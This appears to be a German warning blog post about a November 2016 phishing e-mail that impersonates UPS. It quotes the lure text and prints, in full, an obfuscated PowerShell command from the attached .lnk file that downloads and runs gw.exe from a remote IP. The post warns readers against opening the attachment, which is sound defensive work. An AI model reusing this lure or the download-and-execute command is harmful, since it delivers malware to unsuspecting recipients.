United Parcel Service von [email protected] oder Deutschland Inc. & Co. OHG von [email protected]

Am Dienstag, den 29. November 2016 wurde durch unbekannte Dritte die folgende E-Mail in deutscher Sprache versendet:

20161129_ups

Betreff: United Parcel Service 
Absender: [email protected]

Sehr geehrter Herr,

bei der Zustellung Ihrer Order DE1476675 hat der Paketbote versucht, Sie telefonisch
zu erreichen, leider ohne Gelingen. Aus diesem Grund wurde die Bestellung zuruck zur Sortierstelle buro.
Wir haben festgestellt, dass im Moment der Paketanmeldung eine falsche Telefonnummer angegeben wurde.
Wir bitten Sie den Lieferschein, den wir an dieses Schreiben angehangt haben, auszudrucken, und sich an die
nachstliegende UPS-Filiale zu wenden.

Mit freundlichen GruBen,
United Parcel Service Deutschland Inc. & Co. OHG
Germany

Achtung: Es handelt sich um eine betrügerische E-Mail! Neben dem o. g. Betreff / Absender kommt z. B. auch noch die Deutschland Inc. & Co. OHG von [email protected] vor. Auch die Order-Nr. ist unterschiedlich (z. B. auch DE9611). Die E-Mail stammt nicht von UPS (United Parcel Service)! Das Unternehmen hat mit der E-Mail nicht zu tun! Klicken Sie daher nicht auf den Anhang!

Die E-Mail kommt mit einem .zip-Archiv, welches unterschiedliche Namen tragen kann:

  • inv3262.zip
  • parc_43809.zip

Im ZIP-Archiv ist eine Datei „parcel.lnk“, was eine Verknüpfung enthält.

20161129_ups_dateien

Bei der Datei „parcel“ zeigen die meisten Systeme die Endung (.lnk für Link) nicht an. Diese geht auf eine lokale Datei, die über Parameter aber eine Datei aus dem Internet nachladen soll:

20161129_ups_link

C:\Windows\System32\cmd.exe /c p^ow^e^rs^he^ll^ -ExecutionPolicy bypass -noprofile -windowstyle hidden (ne^w-o^bj^ec^t^ s^ys^t^e^m.n^et.weB^c^lie^n^T)^.d^oW^nl^O^a^D^f^I^l^e^(‚http://46.30.43.8/gw.exe‘,^’%TEMP%.exe‘); S^t^a^rt^-P^r^oc^es^s ‚%TEMP%.exe‘

Hierbei soll von der IP-Adresse 46.30.43.8 die Datei gw.exe nachgeladen und ausgeführt werden. Beim Test war die IP-Adresse nicht erreichbar. Es handelt sich aber mit Sicherheit nicht um einen Lieferschein. Öffnen Sie daher nicht den Link!

Kommentar(e)

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert